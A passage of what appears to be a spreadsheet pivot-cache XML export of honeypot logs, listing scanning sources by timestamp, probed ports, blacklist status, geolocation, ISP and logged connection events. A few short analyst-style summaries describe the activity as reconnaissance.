    <d v="2025-04-20T14:10:45"/>
    <d v="2025-04-14T09:55:31"/>
    <d v="2025-04-20T14:10:45"/>
    <n v="20"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="MT"/>
    <s v="Montana"/>
    <s v="Missoula"/>
    <s v="Missoula"/>
    <s v="5666639"/>
    <s v="59801"/>
    <s v="46.8501"/>
    <s v="-113.987"/>
    <s v="33588"/>
    <s v="Charter Communications"/>
    <s v="Charter Communications LLC"/>
    <s v="business"/>
    <s v="Spectrum"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4591:a8a6"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1193"/>
    <x v="1193"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-20T14:01:34"/>
    <d v="2025-04-20T14:01:34"/>
    <d v="2025-04-20T14:01:34"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_HTTPS_HC1"/>
    <s v="8443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="IT"/>
    <s v="Italy"/>
    <s v="25"/>
    <s v="Lombardy"/>
    <s v="Milan"/>
    <s v="Milan"/>
    <s v="3173435"/>
    <s v="NA"/>
    <s v="45.4643"/>
    <s v="9.18951"/>
    <s v="211391"/>
    <s v="MITAN-AS"/>
    <s v="Mitan Telematica S.r.l."/>
    <s v="corporate"/>
    <s v="Mitan Telematica S.r.l"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="GET"/>
    <s v="{Data_HTTPS:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6dec:a969"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The malicious activity appears to be reconnaissance and potential exploitation of vulnerable services, with the attackers attempting to gather information about the target systems and networks, and possibly exploiting any open ports or misconfigured services. &amp;&amp; The attacker is probing and exploiting various services on the network, attempting to gain unauthorized access or obtain sensitive information."/>
    <s v=" "/>
  </r>
  <r>
    <x v="1194"/>
    <x v="1194"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-20T12:46:49"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-20T12:46:49"/>
    <n v="102"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H24&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_SMB_H26&amp;&amp;SMA-LAB_MSSQL_H36"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KZ"/>
    <s v="Kazakhstan"/>
    <s v="75"/>
    <s v="Almaty"/>
    <s v="Karasay District"/>
    <s v="Almaty"/>
    <s v="1526384"/>
    <s v="050000"/>
    <s v="43.238"/>
    <s v="76.8829"/>
    <s v="9198"/>
    <s v="JSC Kazakhtelecom"/>
    <s v="JSC Kazakhtelecom"/>
    <s v="business"/>
    <s v="IP Babina"/>
    <s v="2005-12-01"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,63243)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,57067)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,57606)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,61727)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,62386)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,52411)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,52954)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,64062)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,64412)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,57369)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,57911)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,54936)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,55526)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,63183)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,63593)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,59855)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,60389)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,50024)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,50721)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,61628)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,62019)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,53334)}&amp;&amp;{Data_SMB:Incoming connection (88.204.168.182,53773)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:58cc:a8b6"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The activity indicates a reconnaissance phase by the attacker, where they are scanning and probing various services to identify vulnerabilities and potential entry points into the network."/>
    <s v="Scanning and probing for vulnerabilities "/>
  </r>
  <r>
    <x v="1195"/>
    <x v="1195"/>
    <s v="220-133-122-127.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-20T12:11:50"/>
    <d v="2024-04-16T09:38:57"/>
    <d v="2025-04-20T12:11:50"/>
    <n v="425"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H14"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;27753&amp;&amp;58677&amp;&amp;23&amp;&amp;9100&amp;&amp;80&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one"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc85:7a7f"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1196"/>
    <x v="1196"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-20T10:37:17"/>
    <d v="2025-02-15T16:51:55"/>
    <d v="2025-04-20T10:37:17"/>
    <n v="194"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="23&amp;&amp;40704&amp;&amp;6035&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="LT"/>
    <s v="Lithuania"/>
    <s v="VL"/>
    <s v="Vilnius"/>
    <s v="Vilnius City Municipality"/>
    <s v="Vilnius"/>
    <s v="593116"/>
    <s v="08126"/>
    <s v="54.7013"/>
    <s v="25.2601"/>
    <s v="8764"/>
    <s v="Telia Lietuva, AB"/>
    <s v="Telia Lietuva"/>
    <s v="business"/>
    <s v="Telia Lietuva, AB"/>
    <s v="2005-01-13"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:55ce:7489"/>
    <s v="C-I"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1197"/>
    <x v="1197"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-20T10:26:09"/>
    <d v="2024-05-15T13:31:56"/>
    <d v="2025-04-20T10:26:09"/>
    <n v="1046"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_LDAP_H12&amp;&amp;SMA-LAB_SSH_H29&amp;&amp;SMA-LAB_PJL_H16&amp;&amp;SMA-LAB_HTTPS_H30&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_MSSQL_H44"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;389&amp;&amp;22&amp;&amp;9100&amp;&amp;443&amp;&amp;6956"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="UP"/>
    <s v="Uttar Pradesh"/>
    <s v="Aligarh"/>
    <s v="Jalālī"/>
    <s v="1269441"/>
    <s v="202128"/>
    <s v="27.7996"/>
    <s v="78.2932"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Ltd"/>
    <s v="cellular"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="1990-03-24"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:8ba7:4688"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1198"/>
    <x v="1198"/>
    <s v="NA&amp;&amp;78-31-255-245.static.kviknet.net"/>
    <x v="0"/>
    <d v="2025-04-20T10:11:13"/>
    <d v="2025-04-08T03:18:33"/>
    <d v="2025-04-20T10:11:13"/>
    <n v="136"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DK"/>
    <s v="Denmark"/>
    <s v="83"/>
    <s v="South Denmark"/>
    <s v="Kolding Kommune"/>
    <s v="Kolding"/>
    <s v="2618528"/>
    <s v="6000"/>
    <s v="55.5352"/>
    <s v="9.48586"/>
    <s v="204151"/>
    <s v="EWII Bredbaand A/S"/>
    <s v="EWII Bredbaand A/S"/>
    <s v="business"/>
    <s v="EWII Bredbaand"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4e1f:fff5"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1199"/>
    <x v="1199"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-20T10:10:59"/>
    <d v="2025-02-08T19:43:06"/>
    <d v="2025-04-20T10:10:59"/>
    <n v="56"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="11"/>
    <s v="Seoul"/>
    <s v="NA"/>
    <s v="Seoul (Toegye-ro)"/>
    <s v="1835848"/>
    <s v="NA"/>
    <s v="37.5614"/>
    <s v="126.996"/>
    <s v="9318"/>
    <s v="SK Broadband Co Ltd"/>
    <s v="SK Broadband Co Ltd"/>
    <s v="residential"/>
    <s v="SK Broadband Co Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1eb:a34a"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1200"/>
    <x v="1200"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-20T08:31:47"/>
    <d v="2025-01-18T20:52:20"/>
    <d v="2025-04-20T08:31:47"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="Viettel Corporation"/>
    <s v="residential"/>
    <s v="VIETEL"/>
    <s v="2011-03-04"/>
    <s v="VIETTEL-VN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:abf5:5844"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1201"/>
    <x v="1201"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-20T08:11:25"/>
    <d v="2025-03-13T06:00:53"/>
    <d v="2025-04-20T08:11:25"/>
    <n v="46"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H3"/>
    <s v="23&amp;&amp;9100&amp;&amp;NA&amp;&amp;80"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="NY"/>
    <s v="New York"/>
    <s v="New York"/>
    <s v="New York"/>
    <s v="5128581"/>
    <s v="10123"/>
    <s v="40.7831"/>
    <s v="-73.9713"/>
    <s v="701"/>
    <s v="Verizon Business"/>
    <s v="Verizon Communications"/>
    <s v="residential"/>
    <s v="MCI Communications Services, Inc. d/b/a Verizon Business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;NA&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:47f7:da19"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1202"/>
    <x v="1202"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-20T08:10:43"/>
    <d v="2025-03-22T15:29:48"/>
    <d v="2025-04-20T08:10:43"/>
    <n v="19"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H28"/>
    <s v="1433&amp;&amp;445&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="MX"/>
    <s v="Mexico"/>
    <s v="CMX"/>
    <s v="Mexico City"/>
    <s v="Miguel Hidalgo Borough"/>
    <s v="Miguel Hidalgo"/>
    <s v="3827408"/>
    <s v="NA"/>
    <s v="19.4341"/>
    <s v="-99.2002"/>
    <s v="8151"/>
    <s v="Uninet S.A. de C.V."/>
    <s v="Uninet S.A. de C.V."/>
    <s v="business"/>
    <s v="UNINET"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (187.210.23.98,61327)}&amp;&amp;{Data_SMB:Incoming connection (187.210.23.98,61370)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (187.210.23.98,52009)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (187.210.23.98,52048)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;NA&amp;&amp;{Data_SMB:Incoming connection (187.210.23.98,50422)}&amp;&amp;{Data_SMB:Incoming connection (187.210.23.98,50451)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bbd2:1762"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1203"/>
    <x v="1203"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-20T05:28:20"/>
    <d v="2025-02-08T18:21:57"/>
    <d v="2025-04-20T05:28:20"/>
    <n v="29"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H2"/>
    <s v="1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="66"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="UP"/>
    <s v="Uttar Pradesh"/>
    <s v="Lucknow"/>
    <s v="Lucknow (Gaurabagh)"/>
    <s v="1264733"/>
    <s v="226001"/>
    <s v="26.922"/>
    <s v="80.9672"/>
    <s v="136652"/>
    <s v="Bytel Tranet Private Limited"/>
    <s v="Bytel Tranet Private Limited"/>
    <s v="business"/>
    <s v="Bytel TraNet Private Limited"/>
    <s v="2018-02-26"/>
    <s v="BYTEL"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.110.36.198,64398)}&amp;&amp;{Data_SMB:Incoming connection (103.110.36.198,64974)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:676e:24c6"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1204"/>
    <x v="1204"/>
    <s v="164-163-61-91.speedconecte.net.br&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-20T05:25:59"/>
    <d v="2024-12-18T11:33:43"/>
    <d v="2025-04-20T05:25:59"/>
    <n v="13"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H46"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="MT"/>
    <s v="Mato Grosso"/>
    <s v="Campos de Júlio"/>
    <s v="Campos de Júlio"/>
    <s v="12978169"/>
    <s v="NA"/>
    <s v="-13.7245"/>
    <s v="-59.2603"/>
    <s v="265946"/>
    <s v="SPEED CONECTE SERVICOS DE INTERNET LTDA - ME"/>
    <s v="Speed Conecte Servicos De Internet Ltda - ME"/>
    <s v="business"/>
    <s v="Speed Conecte Servicos De Internet Ltda - ME"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2020-11-16 00:00:00"/>
